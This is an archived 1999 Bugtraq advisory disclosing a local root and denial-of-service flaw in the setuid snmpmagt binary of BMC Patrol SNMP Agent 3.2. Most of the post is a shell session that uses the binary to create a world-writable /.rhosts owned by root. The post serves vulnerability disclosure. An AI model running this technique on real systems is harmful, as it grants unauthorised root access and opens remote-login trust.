Home page logo
/

bugtraq logo Bugtraq mailing list archives

Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
From: aalness () GTI NET (Andrew Alness)
Date: Tue, 13 Jul 1999 16:53:27 -0400


Problem in Patrol 3.2
---------------------

vendor:
Copyright 1993-97 BMC Software, Inc.

how bad:
local root/denial of service

example:

maheaa () jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x   1 root       users       185461 Mar  6  1998 snmpmagt*

maheaa () jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found

maheaa () jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0

(first argument must be either an invalid config file or a file that doesn't exist)
maheaa () jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

maheaa () jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw-   1 root       users          770 Jul 13 14:42 .rhosts

note: if the file exists it keeps the same perms, otherwise creates it
with perms based on your umask and chown's to whoever owns the parent
directory of the file you're creating. if the file exists it overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.

- aalness () gti net


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]